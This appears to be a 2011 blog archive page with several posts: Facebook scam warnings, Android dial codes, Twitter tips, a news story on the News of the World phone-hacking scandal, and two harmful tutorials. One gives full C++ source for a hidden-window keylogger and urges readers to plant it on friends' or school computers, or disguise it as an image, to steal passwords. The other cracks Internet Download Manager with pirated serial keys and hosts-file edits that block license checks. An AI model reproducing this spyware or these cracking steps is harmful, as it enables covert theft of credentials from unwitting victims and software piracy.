ShareThis

6/22/2011 The 9 Most Common Facebook Scams.

The 9 Most Common Facebook Scams.


Facebook recently launched a new security wall to block scammers, but many are worried these measures won’t stop spam from spreading and that determined con artists will simply find new ways to get at unsuspecting users.


We’ve all seen suspicious posts on Facebook–a friend’s curiously impersonal message that’s riddled with odd typos, the irresistible app offering a chance to see who has viewed your profile, and more. These scams are sometimes obvious and easy to avoid, other times nefarious and simple to fall for.


Despite Facebook’s security features, safe social networking rests in the user’s own hands.


We’ve put together a list of some of the most common Facebook scams and what happens if you fall for them. Take a look through the slideshow (below) and vote for the worst scam. Then, view our slideshow of 9 Facebook privacy tips to beef up your personal social networking safety.


Clickjacking:-


Clickjackers on Facebook entice users to copy and paste text into their browser bar by posting too-good-to-be-true offers and eye-catching headlines. Once the user infects his own computer with the malicious code, the clickjackers can take control of his account, spam his friends and further spread their scam. For example, clickjacking schemes hit Facebook soon after bin Laden’s death and spread like wildfire by purporting to offer users a glimpse at video or photos of bin Laden’s death.


Fake Polls Or Questionnaires


If you click on an ad or a link that takes you to questionnaire on a site outside Facebook, it’s best to close the page. When you complete a fake quiz, you help a scammer earn commission. Sometimes the quiz may ask you to enter your mobile number before you can view your results. If the scammers get your number, they could run up charges on your account.


Phishing Schemes


Phishers go after your credentials (username, password and sometimes more), then take over your profile, and may attempt to gain access to your other online accounts. Phishing schemes can be difficult to spot, especially if the scammers have set up a page that resembles Facebook’s login portal.


Phony Email Or Message


Facebook warns users to be on the lookout for emails or messages from scammers masquerading as “The Facebook Team” or “Facebook.” These messages often suggest “urgent action” and may ask the user to update his account. They frequently contain links to malware sites or virus-ridden attachments. They may even ask for your username and password. The best advice Facebook offers is to report the sender and delete the messages without clicking anything.


Money Transfer Scam


If a friend sent you a desperate-sounding Facebook chat message or wall post asking for an emergency money transfer, you’d want to help, right? Naturally. That’s what makes this scam so awful. The point is to get you to wire money to scammers via Western Union or another transfer service.


Fake Friend Request


Not all friend requests come from real people, despite Facebook’s safeguards against bots. Some Facebook accounts exist purely to establish broad connections for spamming or extracting personal data from users, so watch out whose friend requests you accept.


Fake Page Spam


Malicious pages, groups or event invitations aim to trick the user into performing actions that Facebook considers “abusive.” For instance, a fake invite might offer a prize if you forward it to all your friends or post spammy content on their walls. Sometimes a scammer will set up fake pages as a front for a clickjacking or phishing scheme.


Rogue Apps


Malicious apps are pretty common on Facebook these days. They can be a cover for phishing, malware, clickjacking or money transfer schemes. Oftentimes, the apps look convincingly real enough for users to click “Allow,” as they would do with a normal Facebook app. However, rogue apps use this permission to spread spam through your network of friends. For example, the recent “Facebook Shutdown” scam spread by claiming that Facebook would delete all inactive accounts except those that confirmed via app installation.


The Koobface Worm


The Koobface worm is getting on in years (it first appeared in late 2008) and has been mostly scrubbed from the site, but Facebook still warns users to look out for it. Koobface spreads across social networks like Facebook via posts containing a link that claims to be an Adobe Flash Player update. Really, the link downloads malware that will infect your computer, hijack your Facebook profile and spam all your friends with its malicious download link.


@Atul Purohit

Digg it StumbleUpon del.icio.us

Secret Codes of Android Phones/Samsung Wave

Secret Codes of Android Phones/Samsung Wave



ou'll get several hidden secret codes which can be used in any Google Android mobile phone to access things which are not accessible by default.

FYI These codes have been obtained by decoding various .apk files present in the phone firmware.

*#*#4636#*#*

This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:





* Phone information
* Battery information
* Battery history
* Usage statistics

*#*#7780#*#*

This code can be used for a factory data reset. It'll remove following things:

* Google account settings stored in your phone
* System and application data and settings
* Downloaded applications

It'll NOT remove:

* Current system software and bundled applications
* SD card files e.g. photos, music files, etc.



PS: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.


*2767*3855#

Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.


PS: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.


*#*#34971539#*#*

This code is used to get information about phone camera. It shows following 4 menus:


* Update camera firmware in image (Don't try this option)
* Update camera firmware in SD card
* Get camera firmware version
* Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.


*#*#7594#*#*

This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.


You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.


*#*#273283*255*663282*#*#*

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.


*#*#197328640#*#*

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.


WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)


*#*#232338#*#* - Shows WiFi MAC address


*#*#1472365#*#* - GPS test


*#*#1575#*#* - Another GPS test


*#*#232331#*#* - Bluetooth test


*#*#232337#*# - Shows Bluetooth device address


*#*#8255#*#*

This code can be used to launch GTalk Service Monitor.


Codes to get Firmware version information:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate


*#*#1234#*#* - PDA and Phone


*#*#1111#*#* - FTA SW Version


*#*#2222#*#* - FTA HW Version


*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number


Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback


*#*#0*#*#* - LCD test


*#*#0673#*#* OR *#*#0289#*#* - Melody test


*#*#0842#*#* - Device test (Vibration test and BackLight test)


*#*#2663#*#* - Touch screen version


*#*#2664#*#* - Touch screen test


*#*#0588#*#* - Proximity sensor test


*#*#3264#*#* - RAM version


NOTE: All above codes have been checked on Google Android phone Samsung Galaxy I7500 only but they should also work in other Google Android phones.



@Atul Purohit
Digg it StumbleUpon del.icio.us

How to Hack or crack IDM manually.

How to Hack or crack IDM manuallyLink



How to hack or crack Internet Download Manager (IDM) manually. IDM is the best Internet download manager available on internet but its not free and its cracked or patched versions contains viruses.

Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID. I am explaining the manual hacking method because most of the patch and keygen contain viruses.

Now suppose you have updated your IDM (Internet Download Manager) and if you are using cracked or patched version, after updating IDM, it shows an error message that you have registered IDM using fake serial key. And after that IDM exits and hence it doesn't download anything.

This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.



http://www.internetdownloadmanager.com/pictures/idm_about.png

let's start the tutorial, How to hack or crack IDM manually.


Steps Involved:

Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.

If you don't wanna update your version, Just click on Registration.


Step2:
When you click on registration, Now a new dialog appears that is asking for Name, Last Name, Email Address and Serial Key.


Step3:
Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

RLDGN-OV9WU-5W589-6VZH1

HUDWE-UO689-6D27B-YM28M

UK3DV-E0MNW-MLQYX-GENA1

398ND-QNAGY-CMMZU-ZPI39

GZLJY-X50S3-0S20D-NFRF9

W3J5U-8U66N-D0B9M-54SLM

EC0Q6-QN7UH-5S3JB-YZMEK

UVQW0-X54FE-QW35Q-SNZF5

FJJTJ-J0FLF-QCVBK-A287M


And click on ok to register.


Step4:
Now after you click ok, it will show an error message that you have registered IDM using fake serial key and IDM will exit. Now here the hack starts.


Step5:
Now Go to START --}} Then go to RUN and type the following text and click enter:


notepad %windir%\system32\drivers\etc\hosts


For Windows 7 users,
due to security reasons you will not be able to save hosts file.

The trick is below:

First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.
Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.


Step6
: Now a notepad file appears something like this as shown below:




Now copy the below lines of code and add to hosts file as shown above:


127.0.0.1 tonec.com

127.0.0.1 www.tonec.com

127.0.0.1 registeridm.com

127.0.0.1 www.registeridm.com

127.0.0.1 secure.registeridm.com

127.0.0.1 internetdownloadmanager.com

127.0.0.1 www.internetdownloadmanager.com

127.0.0.1 secure.internetdownloadmanager.com

127.0.0.1 mirror.internetdownloadmanager.com

127.0.0.1 mirror2.internetdownloadmanager.com

After adding these piece of code, save the notepad file. And exit from there.
Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire. That means it will remain full version for life time and you can update it without any problem.


@AtulPurohit
Digg it StumbleUpon del.icio.us

7 Amazing Tips to Increase Number Of Followers In Twitter.

7 Amazing Tips to Increase Number Of Followers In Twitter.

New technologies have opened new doors for small businesses and activities like blogging. We have to share our thoughts to others; obviously the best tool for it will be Twitter! Most of the webmasters are using twitter, so if you are not joined in twitter, you must join it soon because you are wasting a valuable thing. More over if you joined the twitter you can say to your friends proudly that you are Twitter Guy! ;)


Anyway come to the point! We all know about twitter, we also knew that followers are very important in order to make our sharing a big success, without followers there is no use of a twitter. So we have to gain followers, so here I am sharing you 10 Amazing things that you can do for getting a large number of followers!! Sound is good na?



1. Optimize Your Tweets and Biography With Keywords!

Google and Bing frequently catch the things that we publish, so that if we optimize our profiles with the most important keywords, we will increase our visibility in the results. But don’t over use it! It will make an impression on you that you are a keyword jerk! ;)


2. I am, I am, I am, Do Not Just Talk About Yourself!

If we do a monologue or make references only to ourselves, we will not win too many fans. Share ideas, give advice, and be funny [Not too much! ;) ] these will surely make an attraction in others mind!


3. Share Interesting Content

Only share Interesting Stuffs! Sharing every bad updates is not good. Always share some thing interesting that people likes. So automatically you can gain a large number of fans!


4. Use Hash Tag [#]

It is a way to get new fans! Now it is a trend to put hash tag in tweets. Many people follow them and if you prove to be interesting!, By the way you get a few more followers. Howz it!


5. Allow Retweets

Always make a retweet button in your website posts. So that if your readers like your post they will retweet it, and on that retweet page they will see your profile asking to follow. So when you got much more retweets automatically fans will also be much more! [This trick will not be work until you use @ yourusername in the first or end part of retweets]


6. Sends Tweets At a Time Which Cause impact!

Send tweets at its first, Means that you have to be updated and you have to be first to tweet that interesting fact! So by the way you can increase the number of retweets and there by fans!!


7. Follow Every One You Saw!!

This is the easiest way to get fans in twitter! There is no more hard work for you in this. You just hang out here and there in twitter and follow all people whom you saw. You will get at least 100 followers back for following 1000! ;)


As i said earlier tweeting good stuffs will help to increase your twitter followers, this is the time for you to check it whether it is correct! So just give it a try by tweeting this post! ;)



So its the time for you to share your personal view to increase number of followers in twitter. Do share all your strategies that you do to make it

Digg it StumbleUpon del.icio.us

Learn To create Keylogger using C++ – Basic Hacking Tutorials

Learn To create Keylogger using C++ – Basic Hacking Tutorials !!!




Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.

Disadvantage of Phishing Web page

you have to upload phishing web page to web hosting. But only few website won’t detect the phishing webpage.

website url is different. Easy to detect that we are hacking.

Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can’t detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
Dev C++. Download it from here: http://www.bloodshed.net/

Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.

#include

using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()

{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)

Save (i,”LOG.txt”);
}
}
system (“PAUSE”);
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)

{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]“);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, ” “);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]“);

else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]“);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]“);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]“);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]“);
else if (key_stroke == VK_HOME)

fprintf(OUTPUT_FILE, “%s”, “[HOME]“);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]“);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]“);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]“);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]“);

else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}

Compile the Code(Ctrl+F9)

Now execute the program by selecting Execute->Run(ctrl+F10)

now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.

bind the exe file with image or any files and send it to your friend.
(0r)

if you have physical access to your college/school system,then copy the exe file in that system and run it.

For now, i just give simple keylogger. Soon i will post most efficient keylogger’s program code !!!


@Atul Purohit


Digg it StumbleUpon del.icio.us

6/20/2011 Police investigating a wider timescale for hacking scandal.


Police investigating a wider timescale for hacking scandal.

At least three complaints fall outside the period 'News of the World' admits it acted unlawfully,


Andy Gilchrist, the former Fire Brigades Union leader, said he had seen police papers in the case dating back to 2001




Police in charge of the News of the World phone-hacking scandal are investigating a wider time frame than that admitted to by the newspaper.

Last week, the paper accepted responsibility for intercepting Sienna Miller's voicemail messages, between 2004 and 2006, but it has assiduously challenged assertions that offences were committed outside that period.

But this paper can reveal that at least three complainants refer to hacking either before or after those dates, and one goes back to 2001, when Rebekah Brooks, now chief executive of News International, was editor of the News of the World.
Last night, Andy Gilchrist, the former Fire Brigade Union leader, said: "I have seen papers in the police's possession from the original Mulcaire haul [the private detective jailed for hacking royal aides' phones] that strongly suggest my phone was hacked into. Further, these papers clearly are marked with dates relating to 2001, 2002 and 2003. I have written to formally request copies of this documentation from the police."

Mr Gilchrist was the subject of extensive coverage in The Sun, the News of the World's sister paper, when his union was on strike. The Sun ran a story headlined "Fire strike leader is a love cheat" during the first week of its editorship by Ms Brooks. News International has always vigorously denied, and continues to deny, that the unlawful activity extended beyond the News of the World.

Other cases against the newspaper are also believed to lie outside the "inclusion zone", including that of Ulrika Jonsson, formerly a columnist on the paper, and Jude Law. The police also have evidence that the phones of the parents of the Soham schoolgirl Jessica Chapman, murdered in August 2002, were hacked.

A News International spokesman said: "We are aware there are potential claims against us from 2003. It was the principle of the apology that we made in April that was important, not the timescale."

The news comes at the end of a week when two new dimensions to the scandal emerged, enveloping both other newspapers and different nefarious methods. It was claimed that Jonathan Rees, a private investigator, had been employed by newspapers other than the News of the World – including the Daily Mirror – and had committed unlawful acts.

Peter Mandelson has asked police to look into whether his bank account was hacked into. Lord Mandelson's concerns relate particularly to 1998, the time of press interest in his mortgage. Piers Morgan, previously editor of the News of the World, edited the Mirror from 1995 and 2004, and friends of the peer note that the pair have never been close.

In a further twist, Alastair Campbell, Tony Blair's former press aide, last night sent Mr Morgan, who boasted of having broken the story of Cherie Booth's pregnancy, a message via Twitter: "Congrats re pregnancy. Btw what exactly did Jonathan Rees give you for the thousands he got from Mirror re me, Peter M, etc?"

Yesterday, it was reported that the England captain, John Terry, had a tracking device planted in his car, and the former Tory party treasurer Lord Ashcroft claimed that more than a decade ago a private investigator had "blagged" his way into the Conservative Party's bank account.

"Some time later," he wrote on the ConservativeHome website, "I discovered that a private detective... had successfully – and, again, illegally – obtained details of my private tax affairs from the Inland Revenue. These were details that eventually found their way into the pages of The Sunday Times."

How the inquiry grew: Accusations, denials and apologises along the way

February 2007 News of the World reporter Clive Goodman and private investigator Glenn Mulcaire are jailed for illegally intercepting voicemail messages. The editor Andy Coulson resigns.

July 2007 Gordon Taylor sues NoW. In documents submitted to court, News Group executives say the company had not been involved in Mulcaire's hacking activity. They deny possessing any record of illegally intercepted messages.

July 2009 Before a Commons select committee, Andy Coulson says he is "absolutely sure" that Goodman was a "rogue case".

September 2010 Coulson "emphatically denies" fresh allegations from a former reporter that he presided over a culture of phone hacking while he was editor.

December 2010 Before open court, at the trial of Tommy Sheridan, Coulson again denies there was a "phone hacking culture" at NoW.

January 2011 NoW news editor Ian Edmondson is sacked. Police launch a new investigation. Coulson quits his Downing Street job, but "stands by" previous denials on phone hacking.

April 2011 Facing dozens of civil actions from alleged phone hack victims, NI makes "unreserved apology" and admits liability for "some" of the cases against it, but insists it will contest other cases.




@ATULPUROHIT
Digg it StumbleUpon del.icio.us
Related Posts Plugin for WordPress, Blogger...

Recent Posts


Popular Posts

Facebook Comment

Trade traffic with me using 2leep.com system